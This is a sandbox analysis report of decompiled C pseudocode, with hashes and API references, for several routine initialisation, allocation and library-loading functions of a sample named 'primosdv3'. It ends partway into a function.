Part of subcall function 00C613DC: __EH_prolog.LIBCMT ref: 00C613E1

Part of subcall function 00C6A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00C6A598

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: H_prolog$CloseFind
String ID:
API String ID: 2506663941-0
Opcode ID: 80e4646ba107c1c2270611d067546f7511d50ca12ecbe30da05764a67e9de3d4
Instruction ID: d56770fbe6358a06d957340403b51b673347aac947750ea086193613612a8d5f
Opcode Fuzzy Hash: 80e4646ba107c1c2270611d067546f7511d50ca12ecbe30da05764a67e9de3d4
Instruction Fuzzy Hash: B441C7719446589ADB30DBA0CC95AFAB3B8AF04304F0405FAE59A97193EF715FC9DB10

Uniqueness

Uniqueness Score: -1.00%

Function 00C613E1 Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00C613E1(intOrPtr __ecx, void* __edx, void* __edi, void* __eflags) {
				void* _t55;
				signed int _t61;
				char _t63;
				intOrPtr _t73;
				char _t82;
				void* _t87;
				intOrPtr _t89;
				void* _t91;
				void* _t96;

				_t96 = __eflags;
				_t87 = __edi;
				E00C7EB78(_t55, _t91);
				_push(__ecx);
				_push(__ecx);
				_t89 = __ecx;
				 *((intOrPtr*)(_t91 - 0x10)) = __ecx;
				E00C69556(__ecx);
				 *((intOrPtr*)(__ecx)) = 0xc935f8;
				 *((intOrPtr*)(_t91 - 4)) = 0;
				E00C65E37(__ecx + 0x1038, _t96);
				 *((char*)(_t91 - 4)) = 1;
				E00C6CE40(__ecx + 0x20f8, __edx, _t96);
				 *((intOrPtr*)(__ecx + 0x21e8)) = 0;
				 *((intOrPtr*)(__ecx + 0x21ec)) = 0;
				E00C6157A();
				_t61 = E00C6157A();
				_t82 =  *((intOrPtr*)(_t91 + 8));
				 *((char*)(_t91 - 4)) = 4;
				 *((intOrPtr*)(__ecx + 0x21d4)) = 0;
				 *((char*)(__ecx + 0x21d0)) = _t61 & 0xffffff00 | _t82 == 0x00000000;
				_t98 = _t82;
				if(_t82 != 0) {
					_t63 = _t82;
				} else {
					_push(0x92f0);
					_t73 = E00C7EB38(__edx, _t98);
					 *((intOrPtr*)(_t91 - 0x14)) = _t73;
					 *((char*)(_t91 - 4)) = 5;
					if(_t73 == 0) {
						_t63 = 0;
					} else {
						_t63 = E00C6B505(_t73); // executed
					}
				}
				 *((intOrPtr*)(_t89 + 0x21d4)) = _t63;
				 *(_t89 + 0x21d8) =  *(_t89 + 0x21d8) | 0xffffffff;
				 *(_t89 + 0x21dc) =  *(_t89 + 0x21dc) | 0xffffffff;
				 *(_t89 + 0x21e0) =  *(_t89 + 0x21e0) | 0xffffffff;
				 *((char*)(_t89 + 0x30)) =  *((intOrPtr*)(_t63 + 0x71a1));
				 *((intOrPtr*)(_t89 + 0x6cc8)) = 2;
				 *((intOrPtr*)(_t89 + 0x6ccc)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cd0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cd8)) = 0;
				 *((intOrPtr*)(_t89 + 0x21e8)) = 0;
				 *((intOrPtr*)(_t89 + 0x21ec)) = 0;
				 *((char*)(_t89 + 0x6cd4)) = 0;
				 *((short*)(_t89 + 0x6cdc)) = 0;
				 *((intOrPtr*)(_t89 + 0x21f0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cb8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cbc)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cc0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cc4)) = 0;
				E00C7FFF0(_t87, _t89 + 0x2220, 0, 0x40);
				E00C7FFF0(_t87, _t89 + 0x2260, 0, 0x34);
				E00C7FFF0(_t87, _t89 + 0x45a8, 0, 0x20);
				 *((intOrPtr*)(_t89 + 0x6cf0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cfc)) = 0;
				 *((intOrPtr*)(_t89 + 0x6d00)) = 0;
				 *((intOrPtr*)(_t89 + 0x6d04)) = 0;
				 *((intOrPtr*)(_t89 + 0x6d08)) = 0;
				 *((intOrPtr*)(_t89 + 0x6d0c)) = 0;
				 *((short*)(_t89 + 0x6d12)) = 0;
				 *((char*)(_t89 + 0x6cee)) = 0;
				 *((char*)(_t89 + 0x6d10)) = 0;
				 *((char*)(_t89 + 0x21f8)) = 0;
				 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
				return _t89;
			}

0x00c613e1
0x00c613e1
0x00c613e1
0x00c613e6
0x00c613e7
0x00c613ea
0x00c613ec
0x00c613ef
0x00c613f6
0x00c61402
0x00c61405
0x00c61410
0x00c61414
0x00c6141f
0x00c61425
0x00c6142b
0x00c61436
0x00c6143b
0x00c61440
0x00c61447
0x00c6144d
0x00c61453
0x00c61455
0x00c6147a
0x00c61457
0x00c61457
0x00c6145c
0x00c61462
0x00c61465
0x00c6146b
0x00c61476
0x00c6146d
0x00c6146f
0x00c6146f
0x00c6146b
0x00c6147c
0x00c61488
0x00c6148f
0x00c61496
0x00c6149f
0x00c614aa
0x00c614b4
0x00c614ba
0x00c614c0
0x00c614c6
0x00c614cc
0x00c614d2
0x00c614d8
0x00c614df
0x00c614e5
0x00c614eb
0x00c614f1
0x00c614f7
0x00c614fd
0x00c6150c
0x00c6151b
0x00c61526
0x00c6152e
0x00c61534
0x00c6153a
0x00c61540
0x00c61546
0x00c6154c
0x00c61552
0x00c6155b
0x00c61561
0x00c61567
0x00c6156f
0x00c61577

APIs

__EH_prolog.LIBCMT ref: 00C613E1

Part of subcall function 00C65E37: __EH_prolog.LIBCMT ref: 00C65E3C

Part of subcall function 00C6CE40: __EH_prolog.LIBCMT ref: 00C6CE45

Part of subcall function 00C6B505: __EH_prolog.LIBCMT ref: 00C6B50A

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: cfa4b0099fb11c3b6604f6c75a6b437bb96df298815d03098906f9f17e1fc4ef
Instruction ID: a3934c00517ec634c76fba5266a0fa2b13b11dc1e43d3399d77b4a86bed6baf7
Opcode Fuzzy Hash: cfa4b0099fb11c3b6604f6c75a6b437bb96df298815d03098906f9f17e1fc4ef
Instruction Fuzzy Hash: 9A4138B0905B409EE724DF798885AE6FBE5BF19300F54492EE5FF87282CB326654DB10

Uniqueness

Uniqueness Score: -1.00%

Function 00C613DC Relevance: 1.6, APIs: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00C613DC(intOrPtr __ecx, void* __edi, void* __eflags) {
				signed int _t61;
				char _t63;
				intOrPtr _t73;
				char _t82;
				void* _t86;
				void* _t87;
				intOrPtr _t89;
				void* _t91;
				void* _t96;

				_t96 = __eflags;
				_t87 = __edi;
				E00C7EB78(0xc92635, _t91);
				_push(__ecx);
				_push(__ecx);
				_t89 = __ecx;
				 *((intOrPtr*)(_t91 - 0x10)) = __ecx;
				E00C69556(__ecx);
				 *((intOrPtr*)(__ecx)) = 0xc935f8;
				 *((intOrPtr*)(_t91 - 4)) = 0;
				E00C65E37(__ecx + 0x1038, _t96);
				 *((char*)(_t91 - 4)) = 1;
				E00C6CE40(__ecx + 0x20f8, _t86, _t96);
				 *((intOrPtr*)(__ecx + 0x21e8)) = 0;
				 *((intOrPtr*)(__ecx + 0x21ec)) = 0;
				E00C6157A();
				_t61 = E00C6157A();
				_t82 =  *((intOrPtr*)(_t91 + 8));
				 *((char*)(_t91 - 4)) = 4;
				 *((intOrPtr*)(__ecx + 0x21d4)) = 0;
				 *((char*)(__ecx + 0x21d0)) = _t61 & 0xffffff00 | _t82 == 0x00000000;
				_t98 = _t82;
				if(_t82 != 0) {
					_t63 = _t82;
				} else {
					_push(0x92f0);
					_t73 = E00C7EB38(_t86, _t98);
					 *((intOrPtr*)(_t91 - 0x14)) = _t73;
					 *((char*)(_t91 - 4)) = 5;
					if(_t73 == 0) {
						_t63 = 0;
					} else {
						_t63 = E00C6B505(_t73); // executed
					}
				}
				 *((intOrPtr*)(_t89 + 0x21d4)) = _t63;
				 *(_t89 + 0x21d8) =  *(_t89 + 0x21d8) | 0xffffffff;
				 *(_t89 + 0x21dc) =  *(_t89 + 0x21dc) | 0xffffffff;
				 *(_t89 + 0x21e0) =  *(_t89 + 0x21e0) | 0xffffffff;
				 *((char*)(_t89 + 0x30)) =  *((intOrPtr*)(_t63 + 0x71a1));
				 *((intOrPtr*)(_t89 + 0x6cc8)) = 2;
				 *((intOrPtr*)(_t89 + 0x6ccc)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cd0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cd8)) = 0;
				 *((intOrPtr*)(_t89 + 0x21e8)) = 0;
				 *((intOrPtr*)(_t89 + 0x21ec)) = 0;
				 *((char*)(_t89 + 0x6cd4)) = 0;
				 *((short*)(_t89 + 0x6cdc)) = 0;
				 *((intOrPtr*)(_t89 + 0x21f0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cb8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cbc)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cc0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cc4)) = 0;
				E00C7FFF0(_t87, _t89 + 0x2220, 0, 0x40);
				E00C7FFF0(_t87, _t89 + 0x2260, 0, 0x34);
				E00C7FFF0(_t87, _t89 + 0x45a8, 0, 0x20);
				 *((intOrPtr*)(_t89 + 0x6cf0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cfc)) = 0;
				 *((intOrPtr*)(_t89 + 0x6d00)) = 0;
				 *((intOrPtr*)(_t89 + 0x6d04)) = 0;
				 *((intOrPtr*)(_t89 + 0x6d08)) = 0;
				 *((intOrPtr*)(_t89 + 0x6d0c)) = 0;
				 *((short*)(_t89 + 0x6d12)) = 0;
				 *((char*)(_t89 + 0x6cee)) = 0;
				 *((char*)(_t89 + 0x6d10)) = 0;
				 *((char*)(_t89 + 0x21f8)) = 0;
				 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
				return _t89;
			}

0x00c613dc
0x00c613dc
0x00c613e1
0x00c613e6
0x00c613e7
0x00c613ea
0x00c613ec
0x00c613ef
0x00c613f6
0x00c61402
0x00c61405
0x00c61410
0x00c61414
0x00c6141f
0x00c61425
0x00c6142b
0x00c61436
0x00c6143b
0x00c61440
0x00c61447
0x00c6144d
0x00c61453
0x00c61455
0x00c6147a
0x00c61457
0x00c61457
0x00c6145c
0x00c61462
0x00c61465
0x00c6146b
0x00c61476
0x00c6146d
0x00c6146f
0x00c6146f
0x00c6146b
0x00c6147c
0x00c61488
0x00c6148f
0x00c61496
0x00c6149f
0x00c614aa
0x00c614b4
0x00c614ba
0x00c614c0
0x00c614c6
0x00c614cc
0x00c614d2
0x00c614d8
0x00c614df
0x00c614e5
0x00c614eb
0x00c614f1
0x00c614f7
0x00c614fd
0x00c6150c
0x00c6151b
0x00c61526
0x00c6152e
0x00c61534
0x00c6153a
0x00c61540
0x00c61546
0x00c6154c
0x00c61552
0x00c6155b
0x00c61561
0x00c61567
0x00c6156f
0x00c61577

APIs

__EH_prolog.LIBCMT ref: 00C613E1

Part of subcall function 00C65E37: __EH_prolog.LIBCMT ref: 00C65E3C

Part of subcall function 00C6CE40: __EH_prolog.LIBCMT ref: 00C6CE45

Part of subcall function 00C6B505: __EH_prolog.LIBCMT ref: 00C6B50A

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 35295b2b6b8e11e2d227a8ef5f63fac687b14ad3b6ae7f84972b7506d65c2cb5
Instruction ID: 3d530c74da6016e72e69cd53495a86eb1fd6f3872e44e1b6bc7acbe59aa142e1
Opcode Fuzzy Hash: 35295b2b6b8e11e2d227a8ef5f63fac687b14ad3b6ae7f84972b7506d65c2cb5
Instruction Fuzzy Hash: 724137B0905B409EE724DF798885AE6FBE5BF19300F54492ED5FF83282CB326654DB10

Uniqueness

Uniqueness Score: -1.00%

Function 00C7359E Relevance: 1.6, APIs: 1, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00C7359E(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t29;
				signed int* _t36;
				signed int _t38;
				intOrPtr _t39;
				intOrPtr _t42;
				signed int _t44;
				void* _t47;
				void* _t60;
				signed int _t65;
				void* _t67;
				void* _t69;
				void* _t73;

				_t29 = E00C7EB78(0xc92a92, _t67);
				_push(__ecx);
				_push(__ecx);
				_t60 = __ecx;
				_t44 = 0;
				_t72 =  *((intOrPtr*)(__ecx + 0x20));
				if( *((intOrPtr*)(__ecx + 0x20)) == 0) {
					_push(0x400400); // executed
					_t42 = E00C7EE53(__ecx, __edx, _t72); // executed
					 *((intOrPtr*)(__ecx + 0x20)) = _t42;
					_t29 = E00C7FFF0(__ecx, _t42, 0, 0x400400);
					_t69 = _t69 + 0x10;
				}
				_t73 =  *(_t60 + 0x18) - _t44;
				if(_t73 == 0) {
					_t65 =  *((intOrPtr*)(_t60 + 0x1c)) +  *((intOrPtr*)(_t60 + 0x1c));
					_t30 = _t65;
					 *(_t67 - 0x10) = _t65;
					_push( ~(0 | _t73 > 0x00000000) | ( ~(_t73 > 0) | _t65 * 0x00004ae4) + 0x00000004); // executed
					_t36 = E00C7EE53(( ~(_t73 > 0) | _t65 * 0x00004ae4) + 4, _t30 * 0x4ae4 >> 0x20, _t73); // executed
					_pop(0xca1098);
					 *(_t67 - 0x14) = _t36;
					 *(_t67 - 4) = _t44;
					_t74 = _t36;
					if(_t36 != 0) {
						_push(E00C72360);
						_push(E00C721C0);
						_push(_t65);
						_t16 =  &(_t36[1]); // 0x4
						_t44 = _t16;
						 *_t36 = _t65;
						_push(0x4ae4);
						_push(_t44);
						E00C7EC7B(_t44, _t60, _t65, _t74);
					}
					 *(_t67 - 4) =  *(_t67 - 4) | 0xffffffff;
					 *(_t60 + 0x18) = _t44;
					_t29 = E00C7FFF0(_t60, _t44, 0, _t65 * 0x4ae4);
					if(_t65 != 0) {
						_t38 = 0;
						 *(_t67 - 0x10) = 0;
						do {
							_t47 =  *(_t60 + 0x18) + _t38;
							if( *((intOrPtr*)(_t47 + 0x4ad4)) == 0) {
								 *((intOrPtr*)(_t47 + 0x4adc)) = 0x4100;
								_t39 = E00C83E33(0xca1098); // executed
								 *((intOrPtr*)(_t47 + 0x4ad4)) = _t39;
								0xca1098 = 0x30c00;
								if(_t39 == 0) {
									E00C66CA7(0xca1098);
								}
								_t38 =  *(_t67 - 0x10);
							}
							_t38 = _t38 + 0x4ae4;
							 *(_t67 - 0x10) = _t38;
							_t65 = _t65 - 1;
						} while (_t65 != 0);
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t67 - 0xc));
				return _t29;
			}

0x00c735a3
0x00c735a8
0x00c735a9
0x00c735ad
0x00c735af
0x00c735b1
0x00c735b4
0x00c735bb
0x00c735bc
0x00c735c4
0x00c735c7
0x00c735cc
0x00c735cc
0x00c735cf
0x00c735d2
0x00c735dd
0x00c735e4
0x00c735e6
0x00c735fe
0x00c735ff
0x00c73604
0x00c73605
0x00c73608
0x00c7360b
0x00c7360d
0x00c7360f
0x00c73614
0x00c73619
0x00c7361a
0x00c7361a
0x00c7361d
0x00c7361f
0x00c73624
0x00c73625
0x00c73625
0x00c7362a
0x00c73634
0x00c7363b
0x00c73645
0x00c73647
0x00c73649
0x00c7364c
0x00c7364f
0x00c73658
0x00c7365f
0x00c73669
0x00c7366e
0x00c73674
0x00c73677
0x00c7367e
0x00c7367e
0x00c73683
0x00c73683
0x00c73686
0x00c7368b
0x00c7368e
0x00c7368e
0x00c7364c
0x00c73645
0x00c73699
0x00c736a1

APIs

__EH_prolog.LIBCMT ref: 00C735A3

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: c0c907c8fc6fee4ecdf16031db95ef2cdb34cf47056a022ff052db9374249c6f
Instruction ID: 1922e4dc25235374170d07172a1712a2e0871b53ab347cd25e57a2304bbf8bfd
Opcode Fuzzy Hash: c0c907c8fc6fee4ecdf16031db95ef2cdb34cf47056a022ff052db9374249c6f
Instruction Fuzzy Hash: 6D21F3B6E40211ABDB149F75CC41A6B77A8FB18314F04853EF51AEB681D7B09A00D7E8

Uniqueness

Uniqueness Score: -1.00%

Function 00C7B093 Relevance: 1.6, APIs: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00C7B093(void* __ecx, void* __edx, void* __eflags) {
				void* __edi;
				void* __esi;
				char _t39;
				char _t41;
				char _t60;
				char _t65;
				signed int _t70;
				void* _t72;
				intOrPtr _t74;
				void* _t77;

				_t77 = __eflags;
				E00C7EB78(0xc92ae8, _t72);
				_push(__ecx);
				E00C7EC50(0x7d2c);
				_push(_t70);
				_push(_t68);
				 *((intOrPtr*)(_t72 - 0x10)) = _t74;
				 *((intOrPtr*)(_t72 - 4)) = 0;
				E00C613DC(_t72 - 0x7d3c, _t68, _t77, 0); // executed
				 *((char*)(_t72 - 4)) = 1;
				E00C61FDC(_t72 - 0x7d3c, __edx, _t70, _t72, _t77,  *((intOrPtr*)(_t72 + 0xc)));
				if( *((intOrPtr*)(_t72 - 0x105f)) == 0) {
					 *((intOrPtr*)(_t72 - 0x24)) = 0;
					 *(_t72 - 0x20) = 0;
					 *((intOrPtr*)(_t72 - 0x1c)) = 0;
					 *((intOrPtr*)(_t72 - 0x18)) = 0;
					 *((char*)(_t72 - 0x14)) = 0;
					 *((char*)(_t72 - 4)) = 2;
					_push(_t72 - 0x24);
					_t59 = _t72 - 0x7d3c;
					_t39 = E00C619AF(_t72 - 0x7d3c, __edx);
					__eflags = _t39;
					if(_t39 != 0) {
						_t70 =  *(_t72 - 0x20);
						_t68 = _t70 + _t70;
						_push(_t70 + _t70 + 2);
						_t65 = E00C83E33(_t59);
						 *((intOrPtr*)( *((intOrPtr*)(_t72 + 0x10)))) = _t65;
						__eflags = _t65;
						if(_t65 != 0) {
							__eflags = 0;
							 *((short*)(_t65 + _t70 * 2)) = 0;
							E00C80320(_t65,  *((intOrPtr*)(_t72 - 0x24)), _t68);
						} else {
							_t70 = 0;
						}
						 *( *(_t72 + 0x14)) = _t70;
					}
					_t60 =  *((intOrPtr*)(_t72 - 0x24));
					 *((char*)(_t72 - 4)) = 3;
					__eflags = _t60;
					if(_t60 != 0) {
						__eflags =  *((char*)(_t72 - 0x14));
						if( *((char*)(_t72 - 0x14)) != 0) {
							__eflags =  *((intOrPtr*)(_t72 - 0x1c)) +  *((intOrPtr*)(_t72 - 0x1c));
							E00C6F445(_t60,  *((intOrPtr*)(_t72 - 0x1c)) +  *((intOrPtr*)(_t72 - 0x1c)));
							_t60 =  *((intOrPtr*)(_t72 - 0x24));
						}
						L00C83E2E(_t60);
					}
					E00C61692(_t72 - 0x7d3c, _t68, _t70); // executed
					_t41 = 1;
				} else {
					E00C61692(_t72 - 0x7d3c, _t68, _t70);
					_t41 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t72 - 0xc));
				return _t41;
			}

0x00c7b093
0x00c7b098
0x00c7b09d
0x00c7b0a3
0x00c7b0a9
0x00c7b0aa
0x00c7b0ad
0x00c7b0b7
0x00c7b0ba
0x00c7b0c8
0x00c7b0cc
0x00c7b0d7
0x00c7b0eb
0x00c7b0ee
0x00c7b0f1
0x00c7b0f4
0x00c7b0f7
0x00c7b0fd
0x00c7b101
0x00c7b102
0x00c7b108
0x00c7b10d
0x00c7b10f
0x00c7b111
0x00c7b114
0x00c7b11a
0x00c7b121
0x00c7b126
0x00c7b128
0x00c7b12a
0x00c7b130
0x00c7b133
0x00c7b13b
0x00c7b12c
0x00c7b12c
0x00c7b12c
0x00c7b146
0x00c7b146
0x00c7b148
0x00c7b14b
0x00c7b14f
0x00c7b151
0x00c7b153
0x00c7b157
0x00c7b15c
0x00c7b160
0x00c7b165
0x00c7b165
0x00c7b169
0x00c7b16e
0x00c7b175
0x00c7b17a
0x00c7b0d9
0x00c7b0df
0x00c7b0e4
0x00c7b0e4
0x00c7b181
0x00c7b18a

APIs

__EH_prolog.LIBCMT ref: 00C7B098

Part of subcall function 00C613DC: __EH_prolog.LIBCMT ref: 00C613E1

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: e9fa8307706291265c2a747b169ad76c3fca205f545bd8cac0c88ad5c9f91818
Instruction ID: 3343388cfaa9ffff033aaf9bc7d2b31cbf78933766fe60bca6fdc2bbb596389f
Opcode Fuzzy Hash: e9fa8307706291265c2a747b169ad76c3fca205f545bd8cac0c88ad5c9f91818
Instruction Fuzzy Hash: BA317E75C00249DBCF25DF65C891AEEBBB4AF09304F54449EE809B7242DB35AF04DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00C8AC98 Relevance: 1.6, APIs: 1, Instructions: 65
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 90%

			E00C8AC98(signed int _a4, CHAR* _a8, intOrPtr* _a12, intOrPtr _a16) {
				struct HINSTANCE__* _t13;
				signed int* _t20;
				signed int _t27;
				signed int _t28;
				signed int _t29;
				signed int _t33;
				intOrPtr* _t34;

				_t20 = 0xcc2628 + _a4 * 4;
				_t27 =  *0xc9e7ac; // 0x2b9f4dac
				_t29 = _t28 | 0xffffffff;
				_t33 = _t27 ^  *_t20;
				asm("ror esi, cl");
				if(_t33 == _t29) {
					L14:
					return 0;
				}
				if(_t33 == 0) {
					_t34 = _a12;
					if(_t34 == _a16) {
						L7:
						_t13 = 0;
						L8:
						if(_t13 == 0) {
							L13:
							_push(0x20);
							asm("ror edi, cl");
							 *_t20 = _t29 ^ _t27;
							goto L14;
						}
						_t33 = GetProcAddress(_t13, _a8);
						if(_t33 == 0) {
							_t27 =  *0xc9e7ac; // 0x2b9f4dac
							goto L13;
						}
						 *_t20 = E00C87CA3(_t33);
						goto L2;
					} else {
						goto L4;
					}
					while(1) {
						L4:
						_t13 = E00C8AD34( *_t34); // executed
						if(_t13 != 0) {
							break;
						}
						_t34 = _t34 + 4;
						if(_t34 != _a16) {
							continue;
						}
						_t27 =  *0xc9e7ac; // 0x2b9f4dac
						goto L7;
					}
					_t27 =  *0xc9e7ac; // 0x2b9f4dac
					goto L8;
				}
				L2:
				return _t33;
			}

0x00c8aca3
0x00c8acac
0x00c8acb2
0x00c8acbc
0x00c8acbe
0x00c8acc2
0x00c8ad2d
0x00000000
0x00c8ad2d
0x00c8acc6
0x00c8accc
0x00c8acd2
0x00c8acee
0x00c8acee
0x00c8acf0
0x00c8acf2
0x00c8ad1d
0x00c8ad1f
0x00c8ad27
0x00c8ad2b
0x00000000
0x00c8ad2b
0x00c8acfe
0x00c8ad02
0x00c8ad17
0x00000000
0x00c8ad17
0x00c8ad0b
0x00000000
0x00000000
0x00000000
0x00000000
0x00c8acd4
0x00c8acd4
0x00c8acd6
0x00c8acde
0x00000000
0x00000000
0x00c8ace0
0x00c8ace6
0x00000000
0x00000000
0x00c8ace8
0x00000000
0x00c8ace8
0x00c8ad0f
0x00000000
0x00c8ad0f
0x00c8acc8
0x00000000

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 00C8ACF8

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: a67e1ea2ce69b17e1947db97ab4e6f0962c5125d9ecdb5d19a2e4f00662afb2d
Instruction ID: e073934e37a6ed1292e02f10566009a02f3466378be5ca9ecd475840d8c217b5
Opcode Fuzzy Hash: a67e1ea2ce69b17e1947db97ab4e6f0962c5125d9ecdb5d19a2e4f00662afb2d
Instruction Fuzzy Hash: E6110A336002356FAB21EE1DDC44A5E7395AB843687164223FD25EB254D731ED0187D6

Uniqueness

Uniqueness Score: -1.00%

Function 00C7DA52 Relevance: 1.6, APIs: 1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00C7DA52(void* __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				intOrPtr _t19;
				char _t20;
				char _t21;
				void* _t24;
				void* _t25;
				void* _t38;
